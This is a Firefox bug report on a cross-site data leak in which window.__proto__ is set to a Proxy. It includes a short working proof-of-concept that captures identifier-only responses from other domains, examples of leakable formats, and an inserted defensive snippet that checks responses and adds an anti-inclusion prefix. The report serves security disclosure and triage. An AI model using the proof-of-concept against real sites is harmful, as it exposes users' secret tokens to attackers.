Cross-site data leak using window.__proto__ = new Proxy

RESOLVED DUPLICATE of bug 1048535

Reporter: till (Unassigned)
Tracking: Trunk; keywords sec-moderate, wsec-disclosure
Description

By setting window.__proto__, it's possible to intercept data from other domains as long as the data consists of either a single token that's a valid JS identifier, or a list of such tokens.

See https://twitter.com/steike/status/533198334547468288 for a POC.

It's actually even simpler to implement this using ES6-style proxies:

// PoC: put a Proxy at the end of the global scope chain so every bare identifier
// resolves (no ReferenceError) and each looked-up name is logged.
window.__proto__ = new Proxy({}, {
    get: function(target, name) {console.log(name); return true;},  // records the leaked token
    has: function(target, name) {return true;}                      // claims every name exists
});

Examples of request results this works for:
"foo05120820e156c2f445f670759be64420" (from the original POC)
"foo,bar"
"foo,
bar,
baz"
"foo;bar"
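As an added example (not code from the bug report or from Firefox): a server-side check for the response shape this bug can leak, i.e. a body that is a script made only of bare identifiers, together with the common XSSI prefix hardening that makes such a body unparsable when included via <script src>. The function names and the `)]}'` prefix are assumptions of this example.

```javascript
// Added example, not from the bug report. A data response is exposed to the
// window.__proto__ / Proxy trick only if, loaded as a script, it consists of
// bare identifiers separated by ',', ';' or newlines (the reporter's examples).
// String literals, numbers and JSON objects are not leakable this way.
const IDENT = /^[A-Za-z_$][\w$]*$/;

// Does the body parse as a script at all? Uses the engine's own parser.
function parsesAsScript(body) {
  try {
    new Function(body);
    return true;
  } catch (e) {
    return false; // SyntaxError: a <script src> include would fail before evaluation
  }
}

// True when the body is a parseable script made only of identifier tokens.
function isIdentifierLeakable(body) {
  const tokens = body.split(/[,;\n]+/).map((t) => t.trim()).filter(Boolean);
  if (tokens.length === 0) return false;
  if (!tokens.every((t) => IDENT.test(t))) return false;
  return parsesAsScript(body); // rejects reserved words and dangling separators
}

// Hardening (assumed convention): prefix data responses with an unparsable
// sequence so cross-site script inclusion throws before any identifier is read.
// The legitimate same-origin consumer strips the prefix before parsing.
const XSSI_PREFIX = ")]}'\n";

function hardenResponse(body) {
  return XSSI_PREFIX + body;
}

function stripPrefix(body) {
  return body.startsWith(XSSI_PREFIX) ? body.slice(XSSI_PREFIX.length) : body;
}

// Constructed sample bodies mirroring the report's examples.
const SAMPLES = ["foo05120820e156c2f445f670759be64420", "foo,bar", "foo,\nbar,\nbaz", "foo;bar"];
const leakableSamples = SAMPLES.filter(isIdentifierLeakable).length; // 4
const hardenedLeakable = SAMPLES.map(hardenResponse).filter(isIdentifierLeakable).length; // 0
```

Run with Node; `leakableSamples` is 4 before hardening and `hardenedLeakable` is 0 after the prefix is applied.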
Calling this sec-moderate (maybe even sec-low?), because it relies on a web app that is not securing its "secret tokens" in a best-practice way.

Dan, can you think of something we could do about this?
Keywords: sec-moderate, wsec-disclosure
Status: NEW → RESOLVED
Last Resolved: 4 years ago
Resolution: --- → DUPLICATE
Duplicate of bug: 1048535
This bug has been marked as a duplicate of a restricted bug.
If it's an exact duplicate, we should consider opening up bug 1048535.